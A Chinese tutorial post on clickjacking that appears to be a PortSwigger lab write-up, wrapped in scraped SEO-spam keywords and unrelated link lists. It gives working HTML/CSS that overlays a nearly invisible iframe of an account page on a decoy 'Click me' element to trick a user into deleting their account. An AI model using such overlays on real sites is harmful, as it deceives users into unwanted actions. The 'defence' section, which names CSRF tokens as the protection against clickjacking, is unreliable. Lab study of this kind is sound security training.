当前位置: 首页 > wzjs >正文

wordpress 表单数据临清聊城网站优化

wordpress 表单数据,临清聊城网站优化,怎么建商城网站吗,织梦cms收费7800一:漏洞原理 1、什么是点解劫持 点击劫持是一种基于界面的攻击,用户通过点击诱饵网站中的一些其他内容,被诱骗点击隐藏网站上的可操作内容。一个网络用户访问一个诱骗网站(也许这是一个由电子邮件提供的链接)并点击一…

一:漏洞原理

1、什么是点解劫持

  • 点击劫持是一种基于界面的攻击,用户通过点击诱饵网站中的一些其他内容,被诱骗点击隐藏网站上的可操作内容。
  • 一个网络用户访问一个诱骗网站(也许这是一个由电子邮件提供的链接)并点击一个按钮来赢得奖品。在不知不觉中,他们被攻击者欺骗,按下了另一个隐藏按钮,这导致了另一个网站上的帐户付款。这是一个点击劫持攻击的例子。该技术依赖于合并一个不可见的、可操作的网页(或多个网页),其中包含一个按钮或隐藏链接,比如说,在iframe中。iframe覆盖在用户预期的诱饵网页内容之上。
    (此攻击与 CSRF攻击的不同之处在于,用户需要执行按钮单击等操作,而CSRF攻击依赖于在用户不知情或不输入的情况下伪造整个请求)
  • 示例:网络用户访问诱饵网站(也许这是电子邮件提供的链接)并点击按钮以赢得奖品。在不知不觉中,他们被攻击者欺骗按下了另一个隐藏按钮,这导致在另一个站点上支付了帐户费用。这是点击劫持攻击的一个示例。该技术依赖于合并一个不可见的、可作的网页(或多个页面),其中包含一个按钮或隐藏的链接,例如,在 iframe 中。iframe 覆盖在用户预期的诱饵网页内容之上。这种攻击与 CSRF 攻击的不同之处在于,用户需要执行诸如按钮单击之类的作,而 CSRF 攻击则依赖于在用户不知情或输入的情况下伪造整个请求。
    在这里插入图片描述

2、防范攻击

  • 通常通过使用CSRF令牌来放置CSRF攻击:特定于会话的一次性使用数字或nonce。

3、构建基本的点击劫持实验

(1)点击劫持攻击使用CSS来创建和操作层。攻击者将目标网站合并覆盖在诱饵网站的iframe层

<head><style>#target_website {position:relative;width:128px;height:128px;opacity:0.00001;z-index:2;}#decoy_website {position:absolute;width:300px;height:400px;z-index:1;}</style>
</head>
...
<body><div id="decoy_website">...decoy web content here...</div><iframe id="target_website" src="https://vulnerable-website.com"></iframe>
</body>

二:PortSwigger靶场

1、使用 CSRF 令牌保护进行基本点击劫持

(1)题目要求:制作html页面来构建账户页面并欺骗用户删除账户(制作一个相同的界面)

<style>iframe {position:relative;width:$width_value;height: $height_value;opacity: $opacity;z-index: 2;}div {position:absolute;top:$top_value;left:$side_value;z-index: 1;}
</style>
<div>Test me</div>
<iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>我的是:
<style>
iframe {position:relative;width:500px;height: 700px;opacity: 0.0001;z-index: 2;
}
div {position:absolute;top:500px;left:60px;z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0a11000404d22a86c463666000e90017.web-security-academy.net/my-account"></iframe>

陆续更新中…

http://www.dtcms.com/wzjs/790890.html

相关文章:

  • 哪些网站是wordpresswordpress 4.8 主题
  • 租房网站类似于微博网站怎么做的
  • 南京网站关键词优化咨询中信建设有限责任公司陈晓佳简历
  • 网站建设自助建站企业wordpress在线预览
  • 建网站 赚钱怎么建免费论坛网站
  • 常州自助建站seo电商网站页面
  • 网站建设的教材制作网站的费用
  • 互联网金融网站设计网站咨询聊天怎么做
  • 大望路网站建设公司番茄todo社区看片在线观看
  • 网站用户体验度网站建设默认字体
  • 国家城乡和住房建设部网站首页查询seo
  • 网站建设和维护pdf网站建设源代码上传
  • 个人备案 可以做企业网站吗阳朔网站建设公司
  • 建设旅游网站的意义做网站原创要多少钱
  • 抚州做网站手机网站建设经典教程
  • 佛山网站建设公司哪家最好南京便宜网站建设
  • 游戏网站建设的策划方案怎么做淘宝客优惠券网站
  • 做网站不花钱佛山市新城开发建设有限公司网站
  • 中国空间站合作国家名单请多记几个本站域名防止失联
  • 云南省建设厅网站怎么进不去文字生成图片在线使用
  • 贸易公司网站设计案例网站后台页面模板下载
  • 沈阳网站定制亿网通官网
  • 营销型网站的基础建设猎头公司应坚持的原则有
  • 沈阳军成网站建设做网站就上凡科建站
  • 动漫网站建设前期策划做课件需要的纯音乐网站
  • sql可以做网站吗重庆做网站制作公司
  • 网站建设营销怎么做wordpress 找不到文章
  • 网站策划书撰写宠物医疗设计素材网站
  • 受欢迎的宜昌网站建设云南省新农村建设网站
  • 济南高端网站设计某班级网站建设方案